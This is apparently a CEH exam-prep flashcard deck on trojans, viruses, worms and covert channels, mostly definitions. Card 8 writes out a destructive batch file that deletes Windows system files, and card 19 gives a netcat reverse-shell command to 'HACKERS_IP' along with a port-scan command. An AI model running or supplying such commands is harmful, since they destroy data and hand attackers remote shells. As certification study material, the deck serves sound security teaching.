Chapter 8: Trojans, Viruses, Worms, & Covert Channels Flashcards Preview

CEH - Certified Ethical Hacker > Chapter 8: Trojans, Viruses, Worms, & Covert Channels > Flashcards

Flashcards in Chapter 8: Trojans, Viruses, Worms, & Covert Channels Deck (21)
Loading flashcards...
1
Q

Malware

A

short for malicious SW

a term that covers viruses, worms, Trojans, & logic bombs, adware, & spyware

designed to perform malicious & disruptive actions; any type of SW that performs actions w/ out the consent or knowledge of the system owner & results in disruptive action/s

2
Q

Covert channels

A

these channels are unknown, un-monitored pieces of a system that can be exploited to gain access

3
Q

Malware & the Law (3)

A

THE COMPUTER FRAUD & ABUSE ACT - addresses federal computer-related offenses

THE PATRIOT ACT - penalties up to 10 years for a 1st offense, 20 years for a 2nd offense; assesses damages to multiple systems over the course of a year to determine if it exceeds $5000

CAN-SPAM ACT - designed to stop spam;

4
Q

Categories of Malware

A

VIRUSES - self replicating application that attaches itself to executables; typically user action to initiate infectious activities

WORMS - successor to viruses; entirely self-replicating quickly, do not need action performed by user, can be spread across NWs crashing routers, consuming bandwidth & resources

TROJAN HORSES - provides covert access to a system; looks harmless; goals are similar to worm & virus, but info is transmitted & it is more stealthy

ROOTKITS - hide within the core components of a system, very difficult to detect

SPYWARE - collect & forward info about a system or user’s activities in a stealthy manner; most common is keyloggers

ADWARE - replaces homepages in browsers, places pop-up ads, or installs items on a system to advertise a product or service

5
Q

Designing a Virus (6)

A

1) DESIGN - envision & create virus
2) REPLICATION - once deployed, virus spreads through replication
3) LAUNCH - virus carries out task for which it was created
4) DETECTION - virus becomes recognized, antivirus makers investigate
5) INCORPORATION - antivirus makers determine a way to identify the virus & incorporate remediation into their product updates
6) ELIMINATION - users of antivirus products incorporate updates & eliminate virus

6
Q

Kinds of Viruses (12)

A

1) SYSTEM/BOOT SECTOR VIRUS - code in MBR (master boot record), boot seq. is altered, can make HD undetected etc
2) MACRO VIRUSES - takes adv. of embedded languages (word, excel, etc) designed to hide in those files & change configurations
3) CLUSTER VIRUSES - alters file-allocation tables causing file entries to point to the virus instead of the real flie
4) STEALTH/TUNNELING VIRUS - uses various mechanisms to evade detection systems
5) ENCRYPTION VIRUSES - reprograms itself to avoid detection
6) CAVITY/FILE-OVERWRITING VIRUSES - hides in host file without changing file’s appearance;
7) SPARSE-INFECTOR VIRUSES - avoid detection by carrying out infectious actions sporadically or on files of certain length or type, etc
8) COMPANION/CAMOUFLAGE VIRUS - enables SW w/ the same name, but different extensions (i.e. if you execute program.exe, the virus may create program.com & execute that instead)
9) LOGIC BOMB - infects until predetermined event or action occurs; separated into two parts, payload & trigger
10) FILE/MULTIPARTITE VIRUS - infects multiple ways using muliple attack vectors
11) SHELL VIRUSES - SW infects the target application & alters it
12) CRYPTOVIRUSES - encrypts certain files; victim is notified to contact virus creator & pay specific amount (ransom)

7
Q

Hoax

A

makes user take action, but nothing happens (not really a virus, but just as dangerous)

8
Q

Creating a virus

A

Do no execute this code bc it could cause a lot of damage

1) Create a batch file called virus.bat using Notepad

2) Enter the following code:
@echo off
Del c:\windows\ystem*.*
Del c:\windows*.*

3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com

Another way is to use JPS Virus Maker/TeraBIT Virus Maker 2.8 SE (Has GUI)

9
Q

Sheep dip system

A

used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; The computer is stripped down & includes on those services & apps needed to test the SW

10
Q

Methods of Spyware infection

A

1) P2P
2) IM
3) IRC - internet relay chat
4) E-mail attachments
5) Physical access
6) Browser defects - don’t update patches
7) Freeware - DLing SW for free from unknown SW
8) Websites
9) SW installs - victim DLs SW, but packaged w/ it is a payload that is silently installed in the BG

11
Q

What are the two items Trojans rely on?

A

1) OVERT CHANNELS - communication path or channel used to send info or perform other actions; HTTP and TCP/IP are examples to send info
2) COVERT CHANNEL - path used to transmit info, but does so in a way that is supposed to be impossible or it uses a process in a way that it was not intended to be used

12
Q

Types of Trojans

A

1) RATs (REMOTE ACCESS TROJANS) - give attacker remote control over system
2) DATA SENDING - transmitting data captured
3) DESTRUCTIVE - seeks to corrupt, erase, or destroy data on system (could affect hardware too)
4) PROXY - attacker hides behind target’s system doing malicious things to another system
5) FTP - the infected hosts becomes a server hosting all kinds of info
6) SECURITY SW DISABLERS

13
Q

Detecting Trojans & Viruses

A

Trojans are used to access through backdoors or covert channels, so a port must be opened to allow this communication.

Port scanning is used to detect them; Tools such as nmap, netstat

14
Q

Using Netstat

Using TCPview

A

NETSTAT
Used to detect open ports & listen for connections on the system;

1) cmd: netstat -an

//CON: not real-time

TCPview //an executable file
Tracks port usage in real time

15
Q

TCP vs UDP when choosing protocol to run open port for access to system

A

typical choice is TCP port bc it is more robust

UDP is typically used to traverse firewall or security architecture

16
Q

What port is generally open?

A

80

17
Q

Using BO2K

A

used to install server & install that server on victim’s computer to gain access

BO2K executable needs to be ran on target system; the application runs an executable called Umgr32.exe which may be masked as a different process in task manager; if stealth was not configured, the app appears as Remote Administration Service

18
Q

Distributing Trojans

A

WRAPPERS - takes payload & merges it with a harmless executable

19
Q

Using Netcat

A

Cmd utility used to read info from connections using TCP or UDP & do port redirection

1) nc -n -v -l -p 80 //set up the listener on system
2) nc -n HACKERS_IP 80 -e cmd.exe //redirect traffic to Hacker’s system
3) Now hacker has victim’s system

Netcat can also do port scanning & place files on target system

nc -v -z -w1 IP_address  - 
//used to scan ports
20
Q

Polymorphic Virus

A

rewrites itself, hides payload

21
Q

Sparse infector virus

A

infect files selectively